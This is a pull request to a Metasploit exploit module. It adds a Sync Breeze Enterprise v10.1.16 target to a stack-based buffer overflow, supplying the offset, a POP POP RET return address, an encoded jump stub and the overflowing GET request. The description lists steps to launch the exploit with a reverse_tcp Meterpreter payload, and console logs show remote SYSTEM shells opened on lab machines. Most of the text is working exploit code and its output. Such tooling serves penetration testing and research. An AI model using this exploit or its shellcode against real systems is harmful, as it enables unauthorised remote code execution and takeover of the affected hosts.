### PR TITLE
added new target

### DIFF
--- a/modules/exploits/windows/http/syncbreeze_bof.rb
+++ b/modules/exploits/windows/http/syncbreeze_bof.rb
@@ -15,17 +15,18 @@ class MetasploitModule < Msf::Exploit::Remote
       'Name'           => 'Sync Breeze Enterprise GET Buffer Overflow',
       'Description'    => %q{
         This module exploits a stack-based buffer overflow vulnerability
-        in the web interface of Sync Breeze Enterprise v9.4.28 and v10.0.28, caused by
-        improper bounds checking of the request in HTTP GET and POST requests
-        sent to the built-in web server. This module has been tested
-        successfully on Windows 7 SP1 x86.
+        in the web interface of Sync Breeze Enterprise v9.4.28, v10.0.28,
+        and v10.1.16, caused by improper bounds checking of the request in
+        HTTP GET and POST requests sent to the built-in web server. This
+        module has been tested successfully on Windows 7 SP1 x86.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
           'Daniel Teixeira',
-          'Andrew Smith', # MSF support for v10.0.28
-          'Owais Mehtab'  # Original v10.0.28 exploit
+          'Andrew Smith', 	      # MSF support for v10.0.28
+          'Owais Mehtab',  	      # Original v10.0.28 exploit
+          'Milton Valencia (wetw0rk)' # MSF support for v10.1.16
         ],
       'DefaultOptions' =>
         {
@@ -52,6 +53,12 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Offset' => 780,
               'Ret'    => 0x10090c83  # JMP ESP [libspp.dll]
+            }
+          ],
+          [ 'Sync Breeze Enterprise v10.1.16',
+            {
+              'Offset' => 2495,
+              'Ret'    => 0x1001C65C # POP # POP # RET [libspp.dll]
             }
           ]
         ],
@@ -102,6 +109,9 @@ class MetasploitModule < Msf::Exploit::Remote
     when /10\.0\.28/
       print_status('Target is 10.0.28')
       return targets[2]
+    when /10\.1\.16/
+      print_status('Target is 10.1.16')
+      return targets[3]
     else
       nil
     end
@@ -155,6 +165,35 @@ class MetasploitModule < Msf::Exploit::Remote
           'username' => "#{sploit}",
           'password' => "rawr"
         }
+      )
+    when targets[3]
+      target = targets[3]
+      jumpcode = "\x25\x4a\x4d\x4e\x55"   # and eax,0x554e4d4a
+      jumpcode << "\x25\x35\x32\x31\x2a"  # and eax,0x2a313235
+      jumpcode << "\x2d\x37\x37\x37\x37"  # sub eax,0x37373737
+      jumpcode << "\x2d\x74\x74\x74\x74"  # sub eax,0x74747474
+      jumpcode << "\x2d\x55\x54\x55\x70"  # sub eax,0x70555455
+      jumpcode << "\x50"                  # push eax
+      jumpcode << "\x25\x4a\x4d\x4e\x55"  # and eax,0x554e4d4a
+      jumpcode << "\x25\x35\x32\x31\x2a"  # and eax,0x2a313235
+      jumpcode << "\x2d\x2d\x76\x7a\x63"  # sub eax,0x637a762d
+      jumpcode << "\x2d\x2d\x76\x7a\x30"  # sub eax,0x307a762d
+      jumpcode << "\x2d\x25\x50\x7a\x30"  # sub eax,0x307a5025
+      jumpcode << "\x50"                  # push eax
+      jumpcode << "\xff\xe4"              # jmp esp
+
+      sploit = payload.encoded
+      sploit << 'A' * (target['Offset'] - payload.encoded.length)
+      sploit << "\x74\x06\x75\x06"
+      sploit << [target.ret].pack('V')
+      sploit << jumpcode
+      sploit << 'A' * (9067 - (target['Offset'] + payload.encoded.length + 8 + jumpcode.length))
+
+      send_request_cgi(
+      'uri'        =>  '/' + sploit,
+      'method'     =>  'GET',
+      'host'       =>  '4.2.2.2',
+      'connection' =>  'keep-alive'
       )
     else
       print_error("Exploit not suitable for this target.")


### PR DESCRIPTION
## Vulnerable Application

[Sync Breeze Enterprise](http://www.syncbreeze.com) versions up to v9.4.28 and v10.1.16 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerabilities are caused by improper bounds checking of the request path in HTTP GET requests and username value via HTTP POST requests sent to the built-in web server, respectively. This module has been tested successfully on Windows 7 SP1. The vulnerable applications are available for download at [Sync Breeze Enterprise v9.4.28](http://www.syncbreeze.com/setups/syncbreezeent_setup_v9.4.28.exe), [Sync Breeze Enterprise v10.0.28](http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe), and [Sync Breeze Enterprise v10.1.16](http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.1.16.exe).

## Verification Steps
  1. Install a vulnerable Sync Breeze Enterprise
  2. Start `Sync Breeze Enterprise` service
  3. Start `Sync Breeze Enterprise` client application
  4. Navigate to `Tools` > `Sync Breeze Options` > `Server`
  5. Check `Enable Web Server On Port 80` to start the web interface
  6. Start `msfconsole`
  7. Do `use exploit/windows/http/syncbreeze_bof`
  8. Select appropriate target via `set target 0` or `set target 1`
  9. Do `set RHOST ip`
  10. Do `check`
  11. Verify the target is vulnerable
  12. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
  13. Do `set LHOST ip`
  14. Do `exploit`
  15. Verify the Meterpreter session is opened

## Scenarios

### Sync Breeze Enterprise v9.4.28 on Windows 7 SP1

```
msf exploit(syncbreeze_bof) > show options 

Module options (exploit/windows/http/syncbreeze_bof):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST    192.168.2.10     yes       The target address
   RPORT    80               yes       The target port
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.2.187    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Sync Breeze Enterprise v9.4.28


msf exploit(syncbreeze_bof) > exploit 

[*] Started reverse TCP handler on 192.168.2.187:4444 
[*] Sending request...
[*] Sending stage (957427 bytes) to 172.16.0.18
[*] Meterpreter session 1 opened (172.16.0.20:4444 -> 172..16.0.18:49162) at 2017-05-16 11:00:25 +0100

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo 
Computer        : PC-01
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : pt_PT
Domain          : LAB
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter >
```

### Sync Breeze Enterprise v10.0.28 on Windows 7 SP1
```
msf > use exploit/windows/http/syncbreeze_bof 
msf exploit(syncbreeze_bof) > set rhost 192.168.10.61
rhost => 192.168.10.61
msf exploit(syncbreeze_bof) > set target 1
target => 1
msf exploit(syncbreeze_bof) > exploit

[*] Started reverse TCP handler on 192.168.10.60:4444 
[*] Sending request...
[*] Sending stage (171583 bytes) to 192.168.10.61
[*] Meterpreter session 1 opened (192.168.10.60:4444 -> 192.168.10.61:4129) at 2017-10-09 13:22:15 -0400
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : MUSHROOMKINGDOM
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 
```
### Sync Breeze Enterprise v10.1.16 on Windows 7 SP1
```
msf >  use exploit/windows/http/syncbreeze_bof 
msf exploit(syncbreeze_bof) > set RHOST 192.168.0.19
RHOST => 192.168.0.19
msf exploit(syncbreeze_bof) > exploit

[*] Started reverse TCP handler on 192.168.0.12:4444 
[*] Automatically detecting target...
[*] Target is 10.1.16
[*] Sending stage (179267 bytes) to 192.168.0.19
[*] Meterpreter session 1 opened (192.168.0.12:4444 -> 192.168.0.19:49173) at 2017-12-01 19:17:15 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : MAIK-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 
```

